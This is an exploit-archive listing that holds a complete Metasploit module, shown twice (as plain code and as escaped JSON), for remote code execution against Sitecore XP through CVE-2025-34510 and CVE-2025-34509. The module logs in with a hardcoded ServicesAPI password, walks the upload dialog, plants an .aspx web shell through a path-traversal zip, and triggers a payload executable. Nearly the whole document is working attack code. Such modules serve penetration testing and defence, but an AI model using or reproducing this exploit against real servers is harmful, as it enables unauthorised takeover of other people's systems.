📄 Sitecore XP Post-Authentication Remote Code Execution_PACKETSTORM:209454

8.8 / 10

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Description

This Metasploit module exploits Sitecore...

Visit Original Source

Basic Information

ID PACKETSTORM:209454

Published Sep 12, 2025 at 00:00

Affected Product

Affected Versions ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/zip'

class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking
include Msf::Exploit::Remote::HTTP::SitecoreXp
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Sitecore XP CVE-2025-34510 Post-Authentication Remote Code Execution',
'Description' => %q{
This module exploits CVE-2025-34510, path traversal leading to remote code execution. The module exploits also CVE-2025-34509 - hardcoded credentials of ServicesAPI account - to gain foothold.
},
'License' => MSF_LICENSE,
'Author' => [
'Piotr Bazydlo', # Discovery
'msutovsky-r7' # Module Creator
],
'References' => [
['CVE', '2025-34510'],
['URL', 'https://labs.watchtowr.com/is-b-for-backdoor-pre-auth-rce-chain-in-sitecore-experience-platform'],
['URL', 'https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003667']
],
'DisclosureDate' => '2025-06-17',
'DefaultTarget' => 0,
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' => [
[
'Windows',
{
'Arch' => [ARCH_X86, ARCH_X64]
}
]
],
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)
register_options([
OptString.new('TARGETURI', [true, 'Path to the vulnerable endpoint', '/']),
])
end

def check
return Exploit::CheckCode::Unknown('Could not log in, application might not be Sitecore') unless login_identitysrv('ServicesAPI', 'b')

@is_logged = true

return Exploit::CheckCode::Safe('Could not get elevated cookies') unless get_identity_cookies

@is_elevated = true

sitecore_version = get_version

return Exploit::CheckCode::Vulnerable("Sitecore version detected #{sitecore_version}, which is vulnerable") if sitecore_version.between?(Rex::Version.new('10.0.0'), Rex::Version.new('10.4'))

Exploit::CheckCode::Safe("Detected Sitecore version #{sitecore_version}, which is not vulnerable")
end

def upload_step(data)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri('sitecore', 'shell', 'Applications', 'Dialogs', 'Upload', 'Upload2.aspx'),
'vars_get' => { 'hdl' => 'sc_ct_trk' },
'keep_cookies' => true,
'vars_post' => data
})
res
end

def upload_zipslip
fake_zip = "#{Rex::Text.rand_text_alphanumeric(10)}.zip"

res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri('sitecore', 'shell', 'Applications', 'Dialogs', 'Upload', 'Upload2.aspx'),
'vars_get' => { 'hdl' => 'sc_ct_trk' },
'keep_cookies' => true
})

return false unless res&.code == 200

hidden_inputs = res.get_hidden_inputs
html_body = res.get_html_document

view_state = html_body.at("input[@name='__VIEWSTATE']")

file_el = html_body.xpath('//input').find { |link| link['name'] =~ /File([0-9]+)/ }

return false unless hidden_inputs && view_state && file_el

file_param = file_el['name']

proto = datastore['ssl'] ? 'https' : 'http'

res = upload_step({
'__PARAMETERS' => 'FileChange',
'__EVENTTARGET' => file_param,
'__EVENTARGUMENT' => '',
'__SOURCE' => file_param,
'__EVENTTYPE' => 'change',
'__CONTEXTMENU' => '',
'__MODIFIED' => '',
'__ISEVENT' => '1',
'__SHIFTKEY' => '',
'__CTRLKEY' => '',
'__ALTKEY' => '',
'__BUTTON' => 'undefined',
'__KEYCODE' => 'undefined',
'__X' => 'undefined',
'__Y' => 'undefined',
'__URL' => "#{proto}://#{datastore['vhost']}/sitecore/shell/Applications/Dialogs/Upload/Upload2.aspx%3Fhdl%3Dsc_ct_trk",
'__CSRFTOKEN' => hidden_inputs.dig(0, '__CSRFTOKEN'),
'__VIEWSTATE' => view_state['value'],
'Language' => hidden_inputs.dig(0, 'Language'),
'Item' => hidden_inputs.dig(0, 'Item'),
'Path' => hidden_inputs.dig(0, 'Path'),
'Unzip' => '0',
'Overwrite' => hidden_inputs.dig(0, 'Overwrite'),
file_param => 'C%3A%5Cfakepath%5C' + fake_zip,
'ffSubmitForm' => ''
})

return false unless res&.code == 200

json_data = res.get_json_document

return false unless json_data.dig('commands', 1, 'value') =~ /name="File([a-zA-Z0-9]+)"/

new_file_input = "File#{Regexp.last_match(1)}"

res = upload_step({
'__PARAMETERS' => '',
'__EVENTTARGET' => 'NextButton',
'__EVENTARGUMENT' => '',
'__SOURCE' => 'NextButton',
'__EVENTTYPE' => 'click',
'__CONTEXTMENU' => '',
'__MODIFIED' => '',
'__ISEVENT' => '1',
'__SHIFTKEY' => '',
'__CTRLKEY' => '',
'__ALTKEY' => '',
'__BUTTON' => '0',
'__KEYCODE' => 'undefined',
'__X' => '1525',
'__Y' => '1258',
'__URL' => "#{proto}://#{datastore['vhost']}/sitecore/shell/Applications/Dialogs/Upload/Upload2.aspx%3Fhdl%3Dsc_ct_trk",
'__CSRFTOKEN' => hidden_inputs.dig(0, '__CSRFTOKEN'),
'__VIEWSTATE' => view_state['value'],
'Language' => hidden_inputs.dig(0, 'Language'),
'Item' => hidden_inputs.dig(0, 'Item'),
'Path' => hidden_inputs.dig(0, 'Path'),
'Unzip' => '0',
'Overwrite' => hidden_inputs.dig(0, 'Overwrite'),
new_file_input => '',
file_param => 'C%3A%5Cfakepath%5C' + fake_zip,
'ffSubmitForm' => ''
})

return false unless res&.code == 200

res = upload_step({
'__PARAMETERS' => '',
'__EVENTTARGET' => 'NextButton',
'__EVENTARGUMENT' => '',
'__SOURCE' => 'NextButton',
'__EVENTTYPE' => 'click',
'__CONTEXTMENU' => '',
'__MODIFIED' => '',
'__ISEVENT' => '1',
'__SHIFTKEY' => '',
'__CTRLKEY' => '',
'__ALTKEY' => '',
'__BUTTON' => '0',
'__KEYCODE' => 'undefined',
'__X' => '1524',
'__Y' => '1265',
'__URL' => "#{proto}://#{datastore['vhost']}/sitecore/shell/Applications/Dialogs/Upload/Upload2.aspx%3Fhdl%3Dsc_ct_trk",
'__CSRFTOKEN' => hidden_inputs.dig(0, '__CSRFTOKEN'),
'__VIEWSTATE' => view_state['value'],
'Language' => hidden_inputs.dig(0, 'Language'),
'Item' => hidden_inputs.dig(0, 'Item'),
'Path' => hidden_inputs.dig(0, 'Path'),
'Unzip' => '0',
'Overwrite' => hidden_inputs.dig(0, 'Overwrite'),
new_file_input => '',
file_param => 'C%3A%5Cfakepath%5C' + fake_zip,
'ffSubmitForm' => ''
})

return false unless res&.code == 200

res = upload_step({
'__PARAMETERS' => 'upload:unzipclicked',
'__EVENTTARGET' => 'UnzipCheck',
'__EVENTARGUMENT' => '',
'__SOURCE' => 'UnzipCheck',
'__EVENTTYPE' => 'change',
'__CONTEXTMENU' => '',
'__MODIFIED' => '',
'__ISEVENT' => '1',
'__SHIFTKEY' => '',
'__CTRLKEY' => '',
'__ALTKEY' => '',
'__BUTTON' => 'undefined',
'__KEYCODE' => 'undefined',
'__X' => 'undefined',
'__Y' => 'undefined',
'__URL' => "#{proto}://#{datastore['vhost']}/sitecore/shell/Applications/Dialogs/Upload/Upload2.aspx%3Fhdl%3Dsc_ct_trk",
'__CSRFTOKEN' => hidden_inputs.dig(0, '__CSRFTOKEN'),
'__VIEWSTATE' => view_state['value'],
'Language' => hidden_inputs.dig(0, 'Language'),
'Item' => hidden_inputs.dig(0, 'Item'),
'Path' => hidden_inputs.dig(0, 'Path'),
'Unzip' => '0',
'Overwrite' => hidden_inputs.dig(0, 'Overwrite'),
new_file_input => '',
file_param => 'C%3A%5Cfakepath%5C' + fake_zip,
'UnzipCheck' => '1',
'ffSubmitForm' => ''
})

return false unless res&.code == 200

res = upload_step({
'__PARAMETERS' => '',
'__EVENTTARGET' => 'NextButton',
'__EVENTARGUMENT' => '',
'__SOURCE' => 'NextButton',
'__EVENTTYPE' => 'click',
'__CONTEXTMENU' => '',
'__MODIFIED' => '',
'__ISEVENT' => '1',
'__SHIFTKEY' => '',
'__CTRLKEY' => '',
'__ALTKEY' => '',
'__BUTTON' => '0',
'__KEYCODE' => 'undefined',
'__X' => '1523',
'__Y' => '1257',
'__URL' => "#{proto}://#{datastore['vhost']}/sitecore/shell/Applications/Dialogs/Upload/Upload2.aspx%3Fhdl%3Dsc_ct_trk",
'__CSRFTOKEN' => hidden_inputs.dig(0, '__CSRFTOKEN'),
'__VIEWSTATE' => view_state['value'],
'Language' => hidden_inputs.dig(0, 'Language'),
'Item' => hidden_inputs.dig(0, 'Item'),
'Path' => hidden_inputs.dig(0, 'Path'),
'Unzip' => '0',
'Overwrite' => hidden_inputs.dig(0, 'Overwrite'),
new_file_input => '',
file_param => 'C%3A%5Cfakepath%5C' + fake_zip,
'UnzipCheck' => '1',
'ffSubmitForm' => ''
})

return false unless res&.code == 200

res = upload_step({
'__PARAMETERS' => 'StartUploading',
'__EVENTTARGET' => '',
'__EVENTARGUMENT' => '',
'__SOURCE' => '',
'__EVENTTYPE' => '',
'__CONTEXTMENU' => '',
'__MODIFIED' => '',
'__ISEVENT' => '1',
'__CSRFTOKEN' => hidden_inputs.dig(0, '__CSRFTOKEN'),
'__VIEWSTATE' => view_state['value'],
'Language' => hidden_inputs.dig(0, 'Language'),
'Item' => hidden_inputs.dig(0, 'Item'),
'Path' => hidden_inputs.dig(0, 'Path'),
'Unzip' => '1',
'Overwrite' => hidden_inputs.dig(0, 'Overwrite'),
new_file_input => '',
file_param => 'C%3A%5Cfakepath%5C' + fake_zip,
'UnzipCheck' => '1',
'ffSubmitForm' => ''
})

return false unless res&.code == 200

zip = Rex::Zip::Archive.new

@webshell_file = "#{Rex::Text.rand_text_alpha(15)}.aspx"
exe = generate_payload_exe
asp = Msf::Util::EXE.to_exe_aspx(exe)

zip.add_file('//\/../' + @webshell_file, asp)

zip_data = zip.pack

vars_form_data = [
{ 'name' => '__CSRFTOKEN', 'data' => hidden_inputs.dig(0, '__CSRFTOKEN') },
{ 'name' => '__VIEWSTATE', 'data' => view_state['value'] },
{ 'name' => 'Item', 'data' => hidden_inputs.dig(0, 'Item') },
{ 'name' => 'Language', 'data' => hidden_inputs.dig(0, 'Language') },
{ 'name' => 'Path', 'data' => hidden_inputs.dig(0, 'Path') },
{ 'name' => 'Unzip', 'data' => '1' },
{ 'name' => 'Overwrite', 'data' => hidden_inputs.dig(0, 'Overwrite') },
{ 'name' => file_param, 'data' => zip_data, 'content_type' => 'application/zip', 'encoding' => 'binary', 'filename' => fake_zip },
{ 'name' => new_file_input, 'data' => '', 'content_type' => 'application/octet-stream', 'filename' => '' }
]
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri('sitecore', 'shell', 'Applications', 'Dialogs', 'Upload', 'Upload2.aspx'),
'vars_get' => { 'hdl' => 'sc_ct_trk' },
'vars_form_data' => vars_form_data
})

return false unless res&.code == 200 && res.body.include?('Done')

true
end

def trigger_payload
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(@webshell_file)
})
end

def exploit
if !@is_logged && !login_identitysrv('ServicesAPI', 'b')
fail_with(Failure::NoAccess, 'Failed to log in, check the credentials')
end

if !@is_elevated && !get_identity_cookies
fail_with(Failure::Unknown, 'Failed to get elevated cookies')
end

fail_with(Failure::PayloadFailed, 'Failed to upload malicious ZIP') unless upload_zipslip

trigger_payload
end
end

{
    "lastseen": "2025-09-12T17:08:04",
    "description": "This Metasploit module exploits Sitecore...",
    "published": "2025-09-12T00:00:00",
    "modified": "2025-09-12T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Sitecore XP Post-Authentication Remote Code Execution",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:209454",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-34509",
        "CVE-2025-34510"
    ],
    "sourceData": "##\n    # This module requires Metasploit: https://metasploit.com/download\n    # Current source: https://github.com/rapid7/metasploit-framework\n    ##\n    \n    require 'rex/zip'\n    \n    class MetasploitModule < Msf::Exploit::Remote\n    \n      Rank = ExcellentRanking\n      include Msf::Exploit::Remote::HTTP::SitecoreXp\n      include Msf::Exploit::Remote::HttpClient\n      include Msf::Exploit::CmdStager\n      prepend Msf::Exploit::Remote::AutoCheck\n    \n      def initialize(info = {})\n        super(\n          update_info(\n            info,\n            'Name' => 'Sitecore XP CVE-2025-34510 Post-Authentication Remote Code Execution',\n            'Description' => %q{\n              This module exploits CVE-2025-34510, path traversal leading to remote code execution. The module exploits also CVE-2025-34509 - hardcoded credentials of ServicesAPI account - to gain foothold.\n            },\n            'License' => MSF_LICENSE,\n            'Author' => [\n              'Piotr Bazydlo', # Discovery\n              'msutovsky-r7' # Module Creator\n            ],\n            'References' => [\n              ['CVE', '2025-34510'],\n              ['URL', 'https://labs.watchtowr.com/is-b-for-backdoor-pre-auth-rce-chain-in-sitecore-experience-platform'],\n              ['URL', 'https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003667']\n            ],\n            'DisclosureDate' => '2025-06-17',\n            'DefaultTarget' => 0,\n            'Platform' => 'win',\n            'Arch' => [ARCH_X86, ARCH_X64],\n            'Targets' => [\n              [\n                'Windows',\n                {\n                  'Arch' => [ARCH_X86, ARCH_X64]\n                }\n              ]\n            ],\n            'DefaultOptions' => {\n              'RPORT' => 443,\n              'SSL' => true\n            },\n            'Notes' => {\n              'Stability' => [CRASH_SAFE],\n              'Reliability' => [REPEATABLE_SESSION],\n              'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n            }\n          )\n        )\n        register_options([\n          OptString.new('TARGETURI', [true, 'Path to the vulnerable endpoint', '/']),\n        ])\n      end\n    \n      def check\n        return Exploit::CheckCode::Unknown('Could not log in, application might not be Sitecore') unless login_identitysrv('ServicesAPI', 'b')\n    \n        @is_logged = true\n    \n        return Exploit::CheckCode::Safe('Could not get elevated cookies') unless get_identity_cookies\n    \n        @is_elevated = true\n    \n        sitecore_version = get_version\n    \n        return Exploit::CheckCode::Vulnerable(\"Sitecore version detected #{sitecore_version}, which is vulnerable\") if sitecore_version.between?(Rex::Version.new('10.0.0'), Rex::Version.new('10.4'))\n    \n        Exploit::CheckCode::Safe(\"Detected Sitecore version #{sitecore_version}, which is not vulnerable\")\n      end\n    \n      def upload_step(data)\n        res = send_request_cgi({\n          'method' => 'POST',\n          'uri' => normalize_uri('sitecore', 'shell', 'Applications', 'Dialogs', 'Upload', 'Upload2.aspx'),\n          'vars_get' => { 'hdl' => 'sc_ct_trk' },\n          'keep_cookies' => true,\n          'vars_post' => data\n        })\n        res\n      end\n    \n      def upload_zipslip\n        fake_zip = \"#{Rex::Text.rand_text_alphanumeric(10)}.zip\"\n    \n        res = send_request_cgi({\n          'method' => 'GET',\n          'uri' => normalize_uri('sitecore', 'shell', 'Applications', 'Dialogs', 'Upload', 'Upload2.aspx'),\n          'vars_get' => { 'hdl' => 'sc_ct_trk' },\n          'keep_cookies' => true\n        })\n    \n        return false unless res&.code == 200\n    \n        hidden_inputs = res.get_hidden_inputs\n        html_body = res.get_html_document\n    \n        view_state = html_body.at(\"input[@name='__VIEWSTATE']\")\n    \n        file_el = html_body.xpath('//input').find { |link| link['name'] =~ /File([0-9]+)/ }\n    \n        return false unless hidden_inputs && view_state && file_el\n    \n        file_param = file_el['name']\n    \n        proto = datastore['ssl'] ? 'https' : 'http'\n    \n        res = upload_step({\n          '__PARAMETERS' => 'FileChange',\n          '__EVENTTARGET' => file_param,\n          '__EVENTARGUMENT' => '',\n          '__SOURCE' => file_param,\n          '__EVENTTYPE' => 'change',\n          '__CONTEXTMENU' => '',\n          '__MODIFIED' => '',\n          '__ISEVENT' => '1',\n          '__SHIFTKEY' => '',\n          '__CTRLKEY' => '',\n          '__ALTKEY' => '',\n          '__BUTTON' => 'undefined',\n          '__KEYCODE' => 'undefined',\n          '__X' => 'undefined',\n          '__Y' => 'undefined',\n          '__URL' => \"#{proto}://#{datastore['vhost']}/sitecore/shell/Applications/Dialogs/Upload/Upload2.aspx%3Fhdl%3Dsc_ct_trk\",\n          '__CSRFTOKEN' => hidden_inputs.dig(0, '__CSRFTOKEN'),\n          '__VIEWSTATE' => view_state['value'],\n          'Language' => hidden_inputs.dig(0, 'Language'),\n          'Item' => hidden_inputs.dig(0, 'Item'),\n          'Path' => hidden_inputs.dig(0, 'Path'),\n          'Unzip' => '0',\n          'Overwrite' => hidden_inputs.dig(0, 'Overwrite'),\n          file_param => 'C%3A%5Cfakepath%5C' + fake_zip,\n          'ffSubmitForm' => ''\n        })\n    \n        return false unless res&.code == 200\n    \n        json_data = res.get_json_document\n    \n        return false unless json_data.dig('commands', 1, 'value') =~ /name=\"File([a-zA-Z0-9]+)\"/\n    \n        new_file_input = \"File#{Regexp.last_match(1)}\"\n    \n        res = upload_step({\n          '__PARAMETERS' => '',\n          '__EVENTTARGET' => 'NextButton',\n          '__EVENTARGUMENT' => '',\n          '__SOURCE' => 'NextButton',\n          '__EVENTTYPE' => 'click',\n          '__CONTEXTMENU' => '',\n          '__MODIFIED' => '',\n          '__ISEVENT' => '1',\n          '__SHIFTKEY' => '',\n          '__CTRLKEY' => '',\n          '__ALTKEY' => '',\n          '__BUTTON' => '0',\n          '__KEYCODE' => 'undefined',\n          '__X' => '1525',\n          '__Y' => '1258',\n          '__URL' => \"#{proto}://#{datastore['vhost']}/sitecore/shell/Applications/Dialogs/Upload/Upload2.aspx%3Fhdl%3Dsc_ct_trk\",\n          '__CSRFTOKEN' => hidden_inputs.dig(0, '__CSRFTOKEN'),\n          '__VIEWSTATE' => view_state['value'],\n          'Language' => hidden_inputs.dig(0, 'Language'),\n          'Item' => hidden_inputs.dig(0, 'Item'),\n          'Path' => hidden_inputs.dig(0, 'Path'),\n          'Unzip' => '0',\n          'Overwrite' => hidden_inputs.dig(0, 'Overwrite'),\n          new_file_input => '',\n          file_param => 'C%3A%5Cfakepath%5C' + fake_zip,\n          'ffSubmitForm' => ''\n        })\n    \n        return false unless res&.code == 200\n    \n        res = upload_step({\n          '__PARAMETERS' => '',\n          '__EVENTTARGET' => 'NextButton',\n          '__EVENTARGUMENT' => '',\n          '__SOURCE' => 'NextButton',\n          '__EVENTTYPE' => 'click',\n          '__CONTEXTMENU' => '',\n          '__MODIFIED' => '',\n          '__ISEVENT' => '1',\n          '__SHIFTKEY' => '',\n          '__CTRLKEY' => '',\n          '__ALTKEY' => '',\n          '__BUTTON' => '0',\n          '__KEYCODE' => 'undefined',\n          '__X' => '1524',\n          '__Y' => '1265',\n          '__URL' => \"#{proto}://#{datastore['vhost']}/sitecore/shell/Applications/Dialogs/Upload/Upload2.aspx%3Fhdl%3Dsc_ct_trk\",\n          '__CSRFTOKEN' => hidden_inputs.dig(0, '__CSRFTOKEN'),\n          '__VIEWSTATE' => view_state['value'],\n          'Language' => hidden_inputs.dig(0, 'Language'),\n          'Item' => hidden_inputs.dig(0, 'Item'),\n          'Path' => hidden_inputs.dig(0, 'Path'),\n          'Unzip' => '0',\n          'Overwrite' => hidden_inputs.dig(0, 'Overwrite'),\n          new_file_input => '',\n          file_param => 'C%3A%5Cfakepath%5C' + fake_zip,\n          'ffSubmitForm' => ''\n        })\n    \n        return false unless res&.code == 200\n    \n        res = upload_step({\n          '__PARAMETERS' => 'upload:unzipclicked',\n          '__EVENTTARGET' => 'UnzipCheck',\n          '__EVENTARGUMENT' => '',\n          '__SOURCE' => 'UnzipCheck',\n          '__EVENTTYPE' => 'change',\n          '__CONTEXTMENU' => '',\n          '__MODIFIED' => '',\n          '__ISEVENT' => '1',\n          '__SHIFTKEY' => '',\n          '__CTRLKEY' => '',\n          '__ALTKEY' => '',\n          '__BUTTON' => 'undefined',\n          '__KEYCODE' => 'undefined',\n          '__X' => 'undefined',\n          '__Y' => 'undefined',\n          '__URL' => \"#{proto}://#{datastore['vhost']}/sitecore/shell/Applications/Dialogs/Upload/Upload2.aspx%3Fhdl%3Dsc_ct_trk\",\n          '__CSRFTOKEN' => hidden_inputs.dig(0, '__CSRFTOKEN'),\n          '__VIEWSTATE' => view_state['value'],\n          'Language' => hidden_inputs.dig(0, 'Language'),\n          'Item' => hidden_inputs.dig(0, 'Item'),\n          'Path' => hidden_inputs.dig(0, 'Path'),\n          'Unzip' => '0',\n          'Overwrite' => hidden_inputs.dig(0, 'Overwrite'),\n          new_file_input => '',\n          file_param => 'C%3A%5Cfakepath%5C' + fake_zip,\n          'UnzipCheck' => '1',\n          'ffSubmitForm' => ''\n        })\n    \n        return false unless res&.code == 200\n    \n        res = upload_step({\n          '__PARAMETERS' => '',\n          '__EVENTTARGET' => 'NextButton',\n          '__EVENTARGUMENT' => '',\n          '__SOURCE' => 'NextButton',\n          '__EVENTTYPE' => 'click',\n          '__CONTEXTMENU' => '',\n          '__MODIFIED' => '',\n          '__ISEVENT' => '1',\n          '__SHIFTKEY' => '',\n          '__CTRLKEY' => '',\n          '__ALTKEY' => '',\n          '__BUTTON' => '0',\n          '__KEYCODE' => 'undefined',\n          '__X' => '1523',\n          '__Y' => '1257',\n          '__URL' => \"#{proto}://#{datastore['vhost']}/sitecore/shell/Applications/Dialogs/Upload/Upload2.aspx%3Fhdl%3Dsc_ct_trk\",\n          '__CSRFTOKEN' => hidden_inputs.dig(0, '__CSRFTOKEN'),\n          '__VIEWSTATE' => view_state['value'],\n          'Language' => hidden_inputs.dig(0, 'Language'),\n          'Item' => hidden_inputs.dig(0, 'Item'),\n          'Path' => hidden_inputs.dig(0, 'Path'),\n          'Unzip' => '0',\n          'Overwrite' => hidden_inputs.dig(0, 'Overwrite'),\n          new_file_input => '',\n          file_param => 'C%3A%5Cfakepath%5C' + fake_zip,\n          'UnzipCheck' => '1',\n          'ffSubmitForm' => ''\n        })\n    \n        return false unless res&.code == 200\n    \n        res = upload_step({\n          '__PARAMETERS' => 'StartUploading',\n          '__EVENTTARGET' => '',\n          '__EVENTARGUMENT' => '',\n          '__SOURCE' => '',\n          '__EVENTTYPE' => '',\n          '__CONTEXTMENU' => '',\n          '__MODIFIED' => '',\n          '__ISEVENT' => '1',\n          '__CSRFTOKEN' => hidden_inputs.dig(0, '__CSRFTOKEN'),\n          '__VIEWSTATE' => view_state['value'],\n          'Language' => hidden_inputs.dig(0, 'Language'),\n          'Item' => hidden_inputs.dig(0, 'Item'),\n          'Path' => hidden_inputs.dig(0, 'Path'),\n          'Unzip' => '1',\n          'Overwrite' => hidden_inputs.dig(0, 'Overwrite'),\n          new_file_input => '',\n          file_param => 'C%3A%5Cfakepath%5C' + fake_zip,\n          'UnzipCheck' => '1',\n          'ffSubmitForm' => ''\n        })\n    \n        return false unless res&.code == 200\n    \n        zip = Rex::Zip::Archive.new\n    \n        @webshell_file = \"#{Rex::Text.rand_text_alpha(15)}.aspx\"\n        exe = generate_payload_exe\n        asp = Msf::Util::EXE.to_exe_aspx(exe)\n    \n        zip.add_file('//\\/../' + @webshell_file, asp)\n    \n        zip_data = zip.pack\n    \n        vars_form_data = [\n          { 'name' => '__CSRFTOKEN', 'data' => hidden_inputs.dig(0, '__CSRFTOKEN') },\n          { 'name' => '__VIEWSTATE', 'data' => view_state['value'] },\n          { 'name' => 'Item', 'data' => hidden_inputs.dig(0, 'Item') },\n          { 'name' => 'Language', 'data' => hidden_inputs.dig(0, 'Language') },\n          { 'name' => 'Path', 'data' => hidden_inputs.dig(0, 'Path') },\n          { 'name' => 'Unzip', 'data' => '1' },\n          { 'name' => 'Overwrite', 'data' => hidden_inputs.dig(0, 'Overwrite') },\n          { 'name' => file_param, 'data' => zip_data, 'content_type' => 'application/zip', 'encoding' => 'binary', 'filename' => fake_zip },\n          { 'name' => new_file_input, 'data' => '', 'content_type' => 'application/octet-stream', 'filename' => '' }\n        ]\n        res = send_request_cgi({\n          'method' => 'POST',\n          'uri' => normalize_uri('sitecore', 'shell', 'Applications', 'Dialogs', 'Upload', 'Upload2.aspx'),\n          'vars_get' => { 'hdl' => 'sc_ct_trk' },\n          'vars_form_data' => vars_form_data\n        })\n    \n        return false unless res&.code == 200 && res.body.include?('Done')\n    \n        true\n      end\n    \n      def trigger_payload\n        send_request_cgi({\n          'method' => 'GET',\n          'uri' => normalize_uri(@webshell_file)\n        })\n      end\n    \n      def exploit\n        if !@is_logged && !login_identitysrv('ServicesAPI', 'b')\n          fail_with(Failure::NoAccess, 'Failed to log in, check the credentials')\n        end\n    \n        if !@is_elevated && !get_identity_cookies\n          fail_with(Failure::Unknown, 'Failed to get elevated cookies')\n        end\n    \n        fail_with(Failure::PayloadFailed, 'Failed to upload malicious ZIP') unless upload_zipslip\n    \n        trigger_payload\n      end\n    end",
    "sourceHref": "https://packetstorm.news/download/209454",
    "cvss": {
        "score": 8.8,
        "severity": "HIGH",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/209454/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply